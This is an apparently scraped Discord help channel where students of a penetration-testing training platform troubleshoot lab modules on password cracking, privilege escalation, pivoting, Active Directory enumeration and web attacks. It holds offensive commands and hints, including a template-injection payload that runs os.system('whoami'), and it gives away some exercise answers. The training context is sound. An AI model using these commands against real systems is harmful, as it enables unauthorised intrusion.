#modules

1 messages ยท Page 271 of 1

teal dirge
#

Hello i have a question, when im trying to use john to crack the password for zip hash with rockyou wordlist it returns nothing

I'm sure that rockyou wordlist exist in my directory

but when I tried doing the "john zip-hash.txt" and it is working just fine

rustic sage
#

how you specifying the wordlist?

teal dirge
#

Im using this command "john --wordlist=/usr/share/wordlists/rockyou.txt zip-hash.txt"

#

I cant seem to send a screenshot here idk why

west canopy
#

try single quotes instead of double quotes

acoustic owl
rustic sage
#

get your roles, and send a screenshot.

west canopy
dire basin
#

how do I get general chat

#

how do I verify

west canopy
teal dirge
#

Idk why but when im cracking some ssh2john password with rockyou it works

west canopy
#

maybe try one of the wordlists found in the module Resources

coarse escarp
#

So I was trying to make a copy of the root directory like one of the modules suggested as a way to trick the system. That sorta worked? I was able to make it but not write or read. Just that it exists.

fathom pendant
#

Maybe ls in that directory to see what you can do

west canopy
#

ah , the legendary Getting Started - Privilege Escalation section

coarse escarp
#

That's what I've been doing.

fathom pendant
teal dirge
west canopy
#

nice work ๐Ÿ˜‰

fathom pendant
#

ls -la the .ssh directory in /root/ and see what seems interesting (hint; permissions) @coarse escarp

coarse escarp
#

Partially because I can write in certain folders.

fathom pendant
#

Maybe you can read a file you shouldn't

west canopy
#

he is still user1

fathom pendant
#

That too

#

Good catch

#

He still hasn't gotten to user2

#

Which is the important bit

fathom pendant
#

You saw what you could do with sudo -l as user1

coarse escarp
idle sigil
#

Hey, I cannot seem to connect when I try to rdp into the target system via my kali and I cannot figure out why. Please help. ๐Ÿ˜ฆ I can connect to the target via psexec tho.

west canopy
idle sigil
eager ledge
#

Hi I am doing Initial Enumeration of the Domain section of "ACTIVE DIRECTORY ENUMERATION & ATTACKS" module. To answer the first question, it requires us to SSH into the target machine. But when I do SSH, it connects but then exits immediately. I have tried adding -o PreferredAuthentications=password but to no avail. What am I doing wrong?

idle sigil
coarse escarp
#

I think I found something useful

#

gonna come back to this later

smoky gyro
#

the last one

fathom pendant
#

sudo is the key

smoky gyro
#

done

fathom pendant
smoky gyro
#

||already took the key||

fathom pendant
fathom pendant
smoky gyro
#

i think there is an error in my session ?

fathom pendant
smoky gyro
#

yup

#

and there is no new lines in the end

fathom pendant
#

Try using a different text editor to paste into

smoky gyro
#

let me check

eager ledge
solid moth
#

thank you bro! i should've used the single quote. this really tells me that should be serious about everything during pentest!!!

smoky gyro
smoky gyro
fathom pendant
rustic sage
eager ledge
#

I tried 2, and it doesn't work either.

west canopy
#

US EAST pwnbox , US Academy 4 vpn

#

gonna crash now .

#

cheers ๐Ÿ˜‰

fiery crane
#

anyone else not able to spawn targets?

idle sigil
#

academy went down for a few seconds a moment ago

fiery crane
#

I logged out, cleared cache and everything, but the target spawning button is just loading.

#

yep

quick ingot
#

Anyone... Need help on intro to deserialization attacks Skills assessment 2

royal wyvern
#

hey

#

Why can't I talk in general?

rustic sage
jade zephyr
#

Where can I learn pwn as a beginner

rustic sage
# jade zephyr Where can I learn pwn as a beginner
drifting carbon
#

Hi guys,

Iโ€™m currently stuck on the broken auth (bypass via parameter modification) level and running out of ideas. Iโ€™ve tried to brute-force the user_id parameter using a list of digits. Iโ€™ve also tried to brute-force the token parameter in the reset password section, and Iโ€™ve tried some tricks with Burp Suite. However, I donโ€™t really know what else I can do or where exactly I should be brute-forcing.

If you guys have any suggestions, I would really appreciate it. Thanks!

late moth
silk anchor
# smoky gyro

If you didnt get this fixed try adding a line break after the end of key line, had this issue the other day and after some googling this was the issue

normal sand
#

Are the addresses 192.168.186.1 and 192.168.86.1 local addresses? So are the ones they're referring to 178.128.39.165 and 206.189.119.186?

next bronze
#

the first 2 are name servers, the other two are resolved IPs

normal sand
next bronze
normal sand
next bronze
#

yes

#

I wouldn't say they're random nameservers, they're just ns that your host is querying

normal sand
next bronze
#

yes

normal sand
#

Alrighty, thanks as always!

pseudo kiln
#

at the end of metasploit module, does below text ?

#

refer to this ?

rustic sage
#

@errant rover

gentle fog
#

HI i hope evryone is doing good

In the excersie of **SHELLS & PAYLOADS >> Automating Payloads & Delivery with Metasploit **

there is a question
"Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension)"

when we try to enumerate it we find

PORT STATE SERVICE VERSION
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Microsoft Windows USA daytime
17/tcp open qotd Windows qotd (English)
19/tcp open chargen
80/tcp open http Microsoft IIS httpd 10.0

for httpd there are total 5600+ exploits in Metasploit for HTTP how to choose the most suitable exploit for it

pseudo kiln
#

have you considered enumerating the version of the applications that run on HTTP or other services ?

gentle fog
#

can you guide me for the filter which should i use to specify the version of HTTP ?

normal sand
wary forge
#

oh, I don't have access to this channel

pseudo kiln
normal sand
final shale
#

Hey guys so what am i missing on the Nessus skill assessment module? The instance of parrot linux does not have the nessus software on it and i am not able to install it.

#

the same issue goes for the openVAS module

silk anchor
final shale
violet sparrow
#

Trying again: Hey y'all I need some help I don't know if I am attacking the question wrong. I am on the a Linux fundamental's course specifically "Filtering Contents" The first question is just stumping me and I can not seem find the correct answer. I have done multiple combinations of the ss & netstat such as netstat | grep -Ev '127.0.0.1|::1' or ss -tuln | grep '0\.0\.0\.0' | grep -v '127\.0\.0\.1' | wc -l and I am just stumped. If someone could help me out I would appreciate it

primal drift
#

Can someone tell me: will be prizes for htb academy streak? Or its just for fun

muted kindle
violet sparrow
hexed lintel
#

what to do here

gray merlin
#

If you want a /23 it has to start at 172.16.0.0.

hexed lintel
#

got it

rustic sage
#

๐Ÿ‘€

feral nimbus
rustic sage
feral nimbus
rustic sage
#

I just did that today, use netstat -l.

rustic sage
feral nimbus
rustic sage
shut vapor
#

can anybody help me out with "Information Gathing - Web" skill assessment question " Perform active infrastructure identification against the host [https]://i.imgur.com. What server name is returned for the host?" I've tried:

  • Curling the url and X-Served-By: cache-nyc-kteb1890092-NYC
  • nmap -sC -sV and the best result I see is Server: Varnish
  • Digging returns i.imgur.com is a CNAME that points to ipv4.imgur.map.fastly.net.
#

I'm just not sure what they're asking for at this point.

west canopy
shut vapor
#

kind of an easter egg on imgur's part I guess :^)

west canopy
#

yes its definitely unusual

valid viper
#

I still can't ping lab boxes and support seems to be out for the day. Can anyone help me please?

inner geyser
#

Working on the File Uploads Attacks module, Whitelist Filters. More of a Burp Intruder question than the exercise itself. This is an image from the section, with the response at the bottom "Only images are allowed." Some say 'extension not allowed'. If i know certain extensions aren't allowed up front (i.e. PHP) I can just ignore all the extensions with that same length, correct? The others I will just have to manually view the responses, and that's really the only way I can tell which extensions work and which do not?

quick ingot
snow quartz
#

Hi. I'd like to ask about the Windows Privilege Escalation in the section SeImpersonate and SeAssignPrimaryToken. I wonder why there is a how can I find the COM server listening port in the command flag -l 53375 next to JuicyPotato.exe? Is this from the PID that we'd found from tasklist /svc?

next bronze
snow quartz
fathom pendant
#

The point is to make it look like a normal connection to windows

snow quartz
#

ah got it, i understand now. thanks for the answer @fathom pendant @next bronze prayge

rustic sage
#

F

quasi wave
#

I need some help with the File Transfers Module's Windows File Transfers section. This is for the second question. I am trying to get the win_upload.zip file from pwnbox to target VM. I read the section multiple times and even YouTubed an explanation of the section but never look at the answer. The thing is that I keep having trouble doing this no matter which upload method I pick I am having trouble with these PowerShell errors.

Can someone point me in the right direction as to what I'm doing wrong? I even took notes on the section and tried specifying the exact path of the file in PowerShell.

cloud urchin
#

The error says Net-Object is not a command

silk anchor
#

use New-Object

quasi wave
#

I came a little closer this way

cloud urchin
#

looks like the ftp requires a username and password, or at least a username

#

read the error, its in red

#

'the remote server returned an error: not logged in'

quasi wave
#

I see how to specify user and password in cmd prompt not powershell

#

how do I do it in PS?

cloud urchin
#

open chat gpt and paste your script, then say "how do i login anonymously with this one-liner"

quasi wave
#

ok

cloud urchin
#

you can even just paste the pic in

silk anchor
# quasi wave

Are you hosting the ftp server? I would read over the FTP section again, the answers to your questions are in it.

arctic sentinel
#

Hello everyone, I am stuck in the Linux privilegde escalation skills assesment module... I am only missing 2 flags but I am running out of ideas

#

someone has done recently this module:

#

Seems that there are some credentials for the tomcat adm but I cant find them... I have read that I can obtain a root shell by an exploit to the sudo version but I also cant seem to find the right exploit....

#

Any help will be very appreciated ๐Ÿ™‚

west canopy
arctic sentinel
#

yes, and says I can edit a file

west canopy
#

It also says ||where users are defined ||

arctic sentinel
#

but I get access denied when I try to view that file

west canopy
#

which user are you trying to view it is?

arctic sentinel
#

as barry, seems that there are the credentials of the tomcat admin somewhere

#

but I have been looking for a long time and have not found them

west canopy
#

any other files in that directory that seem interesting?

arctic sentinel
#

I have tried all of them and I geta cces denied

west canopy
#

are you sure?

arctic sentinel
#

in the catalina folders are 2 files that I can see but there are no credentials

dim wolf
#

you have checked everything besides one file

arctic sentinel
#

the docker

fathom pendant
#

Not enough red arrows Kappa

arctic sentinel
#

i cant install docker since i am not root

west canopy
#

you are barry

fathom pendant
west canopy
#

barry , incidentally, is part of the barry group .

#

all the files in the directory are owned by root . But then have permissions granted to either the root group, tomcat group , and... barry

arctic sentinel
#

I got it with vim

#

I found the password, I used vim instead of cat

west canopy
#

this command you just tried su barry tomcat-users.xml.bak does not make sense

#

su is used to switch users

arctic sentinel
#

I know... Ive been too many hours with this

#

now I am in the tomcat appliaction

#

!!!!!!!!!!!!!! nice!!!!

autumn pilot
#

careful with the spoilers

fathom pendant
#

Anyway; seems like it's resolved

west canopy
fathom pendant
#

And it seems like @arctic sentinel might need to take a break

autumn pilot
#

well, you are giving out the answer to the exercise

fathom pendant
west canopy
#

No more screenshots with red arrows for you or anyone else now . I'm gonna have to find a new hobby.

#

okay i'm done being off topic .

arctic sentinel
#

sorry....

west canopy
#

no worries bro , it's all in good fun

stiff urchin
#

Today i was facing an issue with ftp attack some VPN servers mostly they located in US has issue with ftp configuration port 2121 was closed yet the correct answer was port 2121 it should be open!

fathom pendant
stiff urchin
fathom pendant
#

it's a known thing with that lab

vestal bloom
#

Hi everyone!!!
I am stuck on the ATTACKING AUTHENTICATION MECHANISMS Skills Assessment module, need some help.
I've tried changing "accountType" to admin and encoding the token with my key as in Further JWT Attacks Exploiting jwk in the module, but it doesn't work, although the situation looks the same as described in the module. Need a hint ๐Ÿ™‚

proud notch
#

Completely stuck on the skills assessment for intro to assembly language. I've figured out a bit for the first question but I'm stuck at a wall; the second question I'm completely stuck on. Can anyone help or DM for confirmation?

next bronze
zinc nimbus
#

i think i downloaded Inveigh-net7.0-win-x64-nativeaot-v2.0.10.zip and used inveigh.exe but it never captured the CT***'s hash

coarse escarp
#

I'm having trouble gaining escalation priv. as I'm lost to where I should look in the /bin folder.

#

I'm trying to get to use2

#

I know I'm supposed to be looking for a file that has creds for user2 but I'd like a bit of a hint.

#

maybe a letter or number or something.

proud notch
next bronze
#

read what I've linked

next bronze
zinc nimbus
next bronze
#

there's another host you should have admin on

zinc nimbus
next bronze
#

have you done the previous questions?

zinc nimbus
#

yes i only know sq01 host and ms01

#

ohh

#

wait im trolling

proud notch
next bronze
#

just combine as is

subtle rose
#

Good afternoon everyone!
Is there a channel for Htb Machines! I have a question regarding the new seasonal machine that came online today. Thank you!

fathom pendant
zinc nimbus
#

ok

#

i used Inveigh-net7.0-win-x64-nativeaot-v2.0.10.zip from inveigh and it looks like it worked i was able to get CT** hash

zealous rune
#

hi i'm on the password attacks module. Stuck on the question in the Attacking AD & NTDS.dit module that asks to submit a the password for John Marston

fathom pendant
#

There's a whole set of methods

#

Also think of common username methodologies

zealous rune
#

I have tried generating a wordlist using cewl based on the website and used that with generated userlist from username_anarchy

#

i also used a list that I created manually using commoon username conventions

#

first.last flast firstlast etc.

fathom pendant
zealous rune
#

thank u

fathom pendant
#

There's one shown in the section

zealous rune
#

one what?

fathom pendant
#

Wordlist

zealous rune
#

ah yes. I also have one in my wordlists folder on my box

fathom pendant
#

sigh

zealous rune
#

or i can try the one in the resources

fathom pendant
#

Use the wordlist shown in the section for password attacking this section

zealous rune
#

thanks

#

I thought I had done that alrady I'm probably getting confused tharshing around. Gonna try my username list with teh supplied password list in the resources

fathom pendant
#

it's not gonna have it

#

maybe the mutated list may have it, which is reused a fair bit

#

but look at the examples where they plug in a password list

#

use that

zealous rune
#

๐Ÿ™‚

#

thanks i think I had u right the first time

zealous rune
zealous rune
fathom pendant
zealous rune
#

yep it's my bad

#

i'm on the right track now i think though thanks to your hints

#

i feel thick sometimes

fathom pendant
#

take a minute to read and your life is better

zealous rune
#

yes indeed

#

also i need to have an idea of what I have already done

earnest imp
#

hello everyone

severe eagle
#

Hey everyone The pivoting tunneling and port forwarding module anyone have issues with the socksoverRDP trying to copy to target flagged as virus will not copy?? anyone else had this issue and fiind resolve?

earnest imp
#

I have a issue with the Skills Assessmet i the module Windows Attacks & Defense

#

I'm not able to get any event log with the ID 4886 or 4887

#

of course I ran successfully the attack

fathom pendant
fathom pendant
severe eagle
#

killa will try that now thank you

neon wadi
#

If you're still looking for this: On webadmin, forward SSH local port 3389 to 3389 on the 5.35 pivot machine; then SSH into the 5.35 machine and set up netsh interface portforward of 3389 from 5.35 to 6.25 port 3389. Now you can RDP from your attack box to the 6.25 machine.

earnest imp
severe eagle
#

hey got passthat and loaded the dll but the exe says plugin wasnt loaded pritty buggy this one

somber geyser
#

Hello, hello, someone has already done the Broken Authentication Skills Assessment, I'm a little stuck

fathom pendant
severe eagle
#

ok rdp to 2nd is that from the 1st machine cause the remote desktop need the proxy to work doesnt it?

fathom pendant
#

by machine number i'm referring to the initial target; #1
the middle machine mentioned in the section; #2
and the final machine mentioned by the question; #3

fathom pendant
#

just rdp to it from the first machine; you have direct access to it; read the text carefully for the ip and creds

indigo shuttle
west canopy
severe eagle
#

Damm cannot get to third

#

networkwont work

fathom pendant
#

then once everything is set up you should be able to go 1 --> 3

west canopy
severe eagle
#

can i close 2 once setup to reduce network stress

earnest imp
earnest imp
#

I guess I cannot check the log thourgh Evet Viewver but directely with the commad lie

fathom pendant
west canopy
#

Can you recall how you were able to connect to PKI before? In the PKI - ESC1 section?

fathom pendant
#

but i believe so; as closing rdp doesn't log out of the session, technically. as you can re-rdp in and pick back up

ionic geode
#

Hey, on academy I'm trying to start a module, by clicking unlock, but nothing happens. Does anyone know why this might be?

#

For extra context, I have recently unlocked a differnt module and I have enough points to unlock it

earnest imp
west canopy
west canopy
ionic geode
#

ty anyway

west canopy
#

brave might have javascript blocked or something

#

or some type of pop up blocker

ionic geode
#

probably

fathom pendant
turbid echo
#

Hello

Any hints for Whitebox pentesting type juggling?

#

I am literally banging my head against the wall

west canopy
mighty sierra
#

Hello guys !!

#

I'm Intrusionz3r0

#

I have a doubt about port forwarding ๐Ÿ™‚

turbid echo
turbid echo
thick spire
#

anyone here able to help get information on a pred?

fathom pendant
thick spire
#

okay thank you,hes said some vile stuff so tryna get information on him before I called the police.

mighty sierra
#

I cannot perform the portforwarding because when I executed the next comand: ssh -L 1234:localhost:3306 ubuntu@10.129.224.78

#

Then I execute: netstat -natp | grep 1234
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
ubuntu@WEB01:~$

#

I don't know why the port forwarding don't work properly ๐Ÿ˜ฆ

#

What am I doing wrogn?

untold fox
#

Anyone here good with Linux?

mighty sierra
untold fox
#

I need to ask some questions for an application I am making

turbid echo
mighty sierra
#

Not working yet ๐Ÿ˜ฆ

fathom pendant
turbid echo
#

Not the pivot box

turbid echo
mighty sierra
#

Let]

#

Let's try ๐Ÿ™‚

#

The target has the port 3306 open locally so I want to access this port using my attacker machine by using portforwarding over SSH

#

So I cannot do it ๐Ÿ˜ฆ

#

I cannot see it externaly so the only way is using a portforwarding

#

I want to use the SSH way

fathom pendant
uneven oracle
#

Iโ€™m trying to transfer a file using the โ€œBashโ€ method, but nothing is happening. Iโ€™m not seeing any files after entering these commands.
Any insight?

mighty sierra
fathom pendant
mighty sierra
fathom pendant
# mighty sierra

i don't see where 3306 is open, I see where 3389 would be open

#

since it's stating RDP

#

also it's much easier to just do ssh -D instead

uneven oracle
fathom pendant
#

also yeah; that IP won't work because it's just an example

#

adapt to your situation

uneven oracle
fathom pendant
#

connection refused it could be that you need to use sudo

#

considering port 80 is < 1024

#

any port < 1024 requires sudo to open

uneven oracle
fathom pendant
#

also; first statement "Connect to target webserver"

#

meaning you have to connect to the target/victim that's listening

uneven oracle
fathom pendant
#

do you have a web server running on port 80?

#

:))

uneven oracle
#

I was able to use a python server and transfer the files, no prop.

fathom pendant
#

if not; adapt to whatever port your webserver is running on

#

:))

#

connection refused == port not open or firewall prevented

uneven oracle
fathom pendant
#

if you notice: the example is stating using a web server

#

and port 80 is default http

#

but if you're not default; you'll need to adapt

#

imo this scenario is something you'll rarely ever encounter

turbid echo
fathom pendant
#

that's just a visual aid

uneven oracle
fathom pendant
#

cat <&3

uneven oracle
fathom pendant
# mighty sierra

in this scenario for the question, I don't believe SQL is actually running, and this is just an example to help clarify

turbid echo
fathom pendant
#

look further down the screenshot

#

:)

uneven oracle
fathom pendant
#

also i suggest taking actual screenshots instead of half-quality phone camera shots

#

makes it much easier to actually read (as long as you're not grabbing a 4k screen)

#

you're using a vm yeah?

rustic sage
#

Lol

fathom pendant
#

depending on your vm there's a host escape key and windows has the win+shift+s which is the screen snip tool

uneven oracle
fathom pendant
#

well; it'll lead to better quality and easier parsing for others

uneven oracle
fathom pendant
#

or at the very least, learn how to aim at your laptop straight

#

instead of at a weird angle

rustic sage
#

๐Ÿ’€๐Ÿ˜‚

turbid echo
uneven oracle
turbid echo
uneven oracle
fathom pendant
#

it was a simple issue between keyboard and chair

uneven oracle
#

Question ๐Ÿ™‹๐Ÿฝโ€โ™‚๏ธ
So, in the modules, we only have access to the target because we were given a vpn key.
How are they gaining access in a real attack?

mighty sierra
#

Hey guys I understood the concept thank you so much for you amazing support !!

fathom pendant
#

either through an external web server; or through a direct connection

#

it just depends on the scope and the contract ยฏ_(ใƒ„)_/ยฏ

#

some want a full out to in; some only want to see what the damage could look like if it was just some internal threat actor

#

the CPTS exam is from the perspective of full Outside to In

uneven oracle
fathom pendant
#

Break through DMZ (The device that would share an Interface with the VPN) to internal (Devices that share an internal network interface with the device)

#

usually via an exposed web-server

uneven oracle
fathom pendant
#

Web servers are by far the most common vector for threat actors to break in

#

it's why a portion of the course goes over surface level web vulns ยฏ_(ใƒ„)_/ยฏ

uneven oracle
muted kindle
#

Hi

fathom pendant
#

just know that pivoting is a small piece of the puzzle

#

hence why it's important to learn

#

otherwise you'd be going from box to box from an internal host, and constantly transferring binaries/files

#

leaving a huge trace/mess to clean

turbid echo
uneven oracle
fathom pendant
#

a lot of the common services that get attacked are also backend services for web services

fathom pendant
#

such as an SQL/Database backend

#

or file hosting server for downloads (FTP)

uneven oracle
fathom pendant
#

yep

#

though in most cases you'd drop some form of persistence rather than a simple reverse shell; (but that goes beyond the scope of CPTS)

muted kindle
#

Thanks for teaching us marcie

fathom pendant
#

I just read a lot

#

But it really just depends

#

that's the whole crux of it;

#

you're not normally gonna find an exposed server that has EVERY service on it

uneven oracle
uneven oracle
fathom pendant
#

often a malicious file download that links their computer to your C2 server

uneven oracle
#

I see.

fathom pendant
#

because having them directly connect to your machine is a one way ticket to getting caught fairly quickly

#

but again attacking individuals is NOT part of HTB curriculum at all

#

and I doubt it will be

#

considering the legal implications that could come of it

uneven oracle
#

They donโ€™t cover social engineering?

fathom pendant
#

no

muted kindle
#

pegasus malware ๐Ÿคข

fathom pendant
#

Social engineering isn't really something that is easily taught

#

you need an actual test dummy to throw your attempts at

uneven oracle
#

Oh ok.
I feel like thatโ€™s in the OSCP

fathom pendant
#

it's not

uneven oracle
#

Hm

fathom pendant
#

the OSCP and CPTS cover similar domains

#

and Social Engineering dives more into Red Team than it does Penetration Testing

#

(it's not mutually exclusive, but you'll see Social Engineering attempts more in a Red Team operation)

muted kindle
fathom pendant
#

there's some phishing

#

but it's not to the extent where they teach you how to set up a tool like GoPhish or other popular phishing tool

uneven oracle
fathom pendant
#

completely different scopes

uneven oracle
#

Hm

fathom pendant
#

Red Team are still on the side of security btw

#

Red/Blue team are two sides of the same coin

#

Red Teams are meant to emulate a more sophisticated threat actor

muted kindle
#

From my understanding pentest focus is picking out vulns and usually thereโ€™s a strict scope while red team literally behave like real world threats and test the ability of your blue team and entire defense system?

fathom pendant
#

AV Evasion, C2 servers, etc.

uneven oracle
fathom pendant
fathom pendant
#

to summarize someone that actually does red teaming: "pen-tests are meant to be comprehensive assessments and red team assessments are meant to represent a realistic threat actor"

#

but you could have a pen-test where they want you to be as quiet as possible, and red team engagements where they want you to make as much noise as possible

uneven oracle
#

They would seem similar, but have some differences in scope.

severe eagle
#

Hey got it marcielee thanks for that yeah internet was nightmare with it was done right just kept disconnecting even with the modem 56k

#

setting

fathom pendant
#

switch to the tcp vpn

split glade
#

I'm creating notes for the different kind of "remote password attacks" that are possible, and I have trouble finding a specific term. Currently I have:

- **Brute Force = user list + pass list**
- **Password Spraying = user list + 1 pass**
- **? = 1 user + pass list**
- **Credential Stuffing = list of user:pass combinations**

So how do you call trying to find the password for a specific user with a list of passwords?

#

like hydra -l username -P pass.list or kerbrute bruteuser

west canopy
#

I'm sure CompTIA is a bit more pedantic

#

actually, "bruteforcing" itself is somewhat of a colloquialism . A literal bruteforce is to test every single possible character combination until the right one is found. But in everday vernacular, bruteforcing is just the overarching term for the types of attacks you are describing.

turbid echo
#

Well, I am stuck at the skills assessment for Whitebox PenetrationTesting. I got Larry. Any advice? Or am I following a rabbit hole?

split glade
#

@west canopy Alright, thanks the answer. After searching on internet then asking 2 LLM and getting different answers every time that's also what I was going for, but I wondered if there was a specific, not widely used word for it.

west canopy
#

we just say "bruteforce the password of the user sam"

fathom pendant
#

There's one instance of using a password spray; but that's in the AD enum and attacks module, in context you already have a foothold user and are doing further enumeration

thorn hawk
#

Good morning Good afternoon to all. I hope you are having an excellent Sunday. I have a question regarding the SSRF template injection example 2. During the exercise the author indicate to inject a Tornado payload to get the whoami on the system as such:

curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam

When I perform the same I get the same result as in the example but I dont see where is the whoami info.

<h3 style="text-align: center;"><em>Email 0 has been subscribed. You'll hear from us soon!</em></h3> --> This should be here but is not very clear what is the current account.

The same things happen when i try to get the ls content of the directory or cat something. No clear result. Any input is welcome. Thank you loads

fathom pendant
#

no

#

' is html for ' or the apostrophe

#

"you'll hear from us soon!"

daring ocean
#

I have the same problem. Has anyone completed the 2nd question on KLEE in the binary fuzzing module? KLEE produces only one error " memory error: null page access" for me. But there should be two errors...

thorn hawk
# fathom pendant no

is very strange because in the exercise i dont see where the whoami comes up. In that picture no whoami account is visible i think.

fresh plinth
thorn hawk
#

yes .... i did this with multiple commands and checked also if the excericise server is ON also. I was getting in burp the same answer for all commands. The same when injecting commands with curl

fresh plinth
#

have you tried using single quotes instead of double quotes?

thorn hawk
fresh plinth
#

ok then im not sure :/ I haven't done this module so idk

thorn hawk
#

no stress ๐Ÿ™‚ thank you for your input cydroz

fierce mason
#

can i dm someone about aen

proud notch
#

For Intro To Assembly Skill Assessment I believe that I have optimized the code correctly but I'm still not getting the flag. Can anybody double check to see if I'm missing something?

next bronze
normal sand
#

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Initial Enumeration of the Domain

When they list the types of setups a client may choose for testing, this is one of them:

VPN access into their internal network (a bit limiting because we will not be able to perform certain attacks such as LLMNR/NBT-NS Poisoning).
Can someone explain to me why we wouldn't be able to perform LLMNR/NBT-NS Poisoning?

#

Can't responder be started and the attack carried out from a machine that we compromise?

split glade
proud notch
normal sand
next bronze
split glade
#

It's a great attack vector to get a first domain user, to "set a foot" in the AD*

next bronze
#

or rather just extract the shellcode because the compiled binary will be a lot bigger

next bronze
normal sand
normal sand
next bronze
normal sand
#

Also, am I understanding the following statement correctly? I've drawn a diagram based on it.

A custom pentest VM within their internal network that calls back to our jump host, and we can SSH into it to perform testing.

next bronze
normal sand
next bronze
proud notch
#

@limber river @next bronze I can proudly tell you I'm an idiot that thinks to much and made this much harder than needed. With that being said I figured it out. Thank you.

round moat
#

hey guys!!
Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
How should I connect?
I used python3 mssqlclient.py backdoor:Password1@<ip> , but still cant connect to it

#

what should I do need help

muted kindle
round moat
#

no

next bronze
#

whats the error

round moat
#

i used msfconsole
and it says login failed unable to connect

next bronze
round moat
#

I cannot get anything
select name from sys.database is not running

strange aspen
#

can someone help me with the file upload attacks type filter?

bright ore
bright ore
novel iris
#

Hi all, I am on the Kerbal Exploit module. Copied the Registry Hives, also priv. esc. to Admin. Upon opening the PS shell as admin and accessing the directory C:\Windows\temp none of the copies hives are there. I have also manually copied it, still nothing shows, any ideas? Thanks in advance!

rustic sage
#

Is there a way to make the yellow banner at the top of the page for all modules go away?

#

I tried using ublock origin but it just broke the page more

normal sand
#

I'm in the AD enum and attacks module right now and I had a thought about Nmap I wanted to check with ya'll.
Is there a difference between the two scans below?

# Scan 1
sudo nmap -sV -sC -Pn -n -iL hosts.list

# Scan 2
sudo nmap -sV -sC -A -Pn -n -iL hosts.list

I know that -A performs some more stuff like OS detection and whatnot but I've had instances where sometimes performing scan 2 will leave out information I found in scan 1. Any of ya'll face similar issues?

Just to be clear, I did not face this issue in the module I'm currently doing.

#

Ya'll can ignore the -iL hosts.list since when I faced this issue, it was against a single IP address/host.

next bronze
#

more flags just check more things, you shouldn't get less information in return

normal sand
fierce mason
next bronze
next bronze
fierce mason
#

on the tomcat host in the internal network (MS01), is the login supposed to be bruteforcable, because i my attempts seem to keep timing out

next bronze
#

timing out or failed to find the right creds

fierce mason
#

it times out before it reaches the last set of creds

next bronze
#

it shouldn't timeout, you need a stable connection to interact with other hosts too

unreal seal
#

Can someone help me in this question from DNS Enumeration using Python
Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.
I have saw all the records using dig and nslookup but no record stands out except SPF.
Update: Solved

normal sand
#

It doesn't, right? At least I didn't see anything in the documentation about it doing so.

next bronze
#

no

#

I mean, don't use namp for vuln scans kek

ionic egret
#

Linux privilege escalation - Environment enumeration, trying to submit the flag but says its wrong, can anyone help out?

storm elk
ionic egret
#

yup made sure to copy the flag only, no spaces

next bronze
#

did you get the right flag

normal sand
#

In this module, there's the following command, but when I run it, it doesn't write the usernames it found to the file. It just outputs in the terminal and the file is empty. What's wrong with the command?

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
turbid jewel
#

Hi

turbid jewel
#

Anyone know's how the format of the question Review the PATH of the htb-student user. What non-default directory is part of the user's PATH? Module: Linux Privilege Escalation, is the full path? I'm having a very hard time here

normal sand
fathom pendant
ionic egret
fathom pendant
#

as > redirects all the stdout, where the output command could do something additional

normal sand
fathom pendant
#

yes

normal sand
#

Ok

fathom pendant
#

as the tool isn't working as intended

normal sand
#

What do ya'll CPTS people do in this case?

fathom pendant
#

use a different tool

next bronze
#

kerbrute is just an old and buggy tool tbh

#

but there's not really a replacement for it

fathom pendant
normal sand
normal sand
next bronze
fathom pendant
next bronze
#

it be like that

normal sand
#

Ya'll do some kinda grep on the output to get the usernames then?

next bronze
#

I use tmux so it's easier to me to manage outputs and search through them afterwards, idk what other peope would do tho

next bronze
normal sand
ionic egret
normal sand
next bronze
next bronze
#

I have a script that will copy the output from the last command

#

but yeah redirection should work in this case

next bronze
normal sand
#

Or just in general?

normal sand
fathom pendant
#

there's also the Documentation and Reporting module

normal sand
#

I did read a bit of it briefly once a long time back.

fathom pendant
#

Documentation and Reporting pulls together practically everything you did up until that point in the path

#

then Attacking Enterprise Networks is the Mock Exam

#

doing that blind (don't read the questions or text) is a good sign you'll be in the right mindset for the exam

normal sand
normal sand
fathom pendant
#

it's not blind if you already saw it once

normal sand
#

I'll have to organize my mess of notes before that module then.

fathom pendant
normal sand
fathom pendant
#

Documentation and Reporting, yes

normal sand
#

Oh, okay, got it.

fathom pendant
#

AEN itself is the walkthrough for itself

#

that's why it's recommended to do it blind

next bronze
#

notes on the engagement is is obsidan, then final report is in ms word, so just transfer them around

normal sand
normal sand
next bronze
normal sand
#

What in the world kinda format is this? I was trying to grep '@inlane' the output of kerberos.

normal sand
next bronze
fathom pendant
next bronze
next bronze
#

findings/vulnerabilites

normal sand
next bronze
#

technical findings details

fathom pendant
#

Technical Findings

normal sand
#

Ohh, okay.

rustic sage
#

Attacking web applications with ffuf
Value Fuzzing

#

seems that everything is accepted, however when i try to use that as one of the ID it claims the ID is invalid

fathom pendant
rustic sage
#

the ID wasn't correct

#

holdon actually

fathom pendant
#

also delete this since it's spoiler

rustic sage
#

got it

#

@fathom pendant done it :D

vague sage
#

whaaat

#

i cant progress on different paths because of my lack of cubes

#

do i have to pay for subscription or something?

normal sand
#

I'm currently struggling in coming up with a way to keep track of what I've done in an engagement. I'm assuming the Documenting module will cover that?

next bronze
#

I use the excalidraw plugin, but I haven't found making diagrams helpful even for complex stuff, usually just a descriptive heading and reading the commands will do but YMMV

vague sage
#

a sacrifice to learn

#

hell yeah

dim wolf
#

you can also give people your referral link

#

they have to purchase a subscription though for you to get cubes

vague sage
#

only its like 20eu instead of 16 y_sadtaxes go crazy

normal sand
vague sage
next bronze
normal sand
#

I'm still exploring ways, so don't have many preferences set yet. Tryna hear what people use, and then test and combine those ways to find my own.

next bronze
#

you can see the headings in the right sidebar

normal sand
next bronze
normal sand
#

I've noticed Heading 1 doesn't show, why is that?

#

Is it considered to be Title?

next bronze
#

it does for me

simple loom
normal sand
oak girder
#

Hello, may I ask why my PWNbox cannot be opened?

normal sand
oak girder
#

Sorry, I didnโ€™t understand the meaning of refreshing, but I tried restarting the web page and exiting the browser

vague sage
#

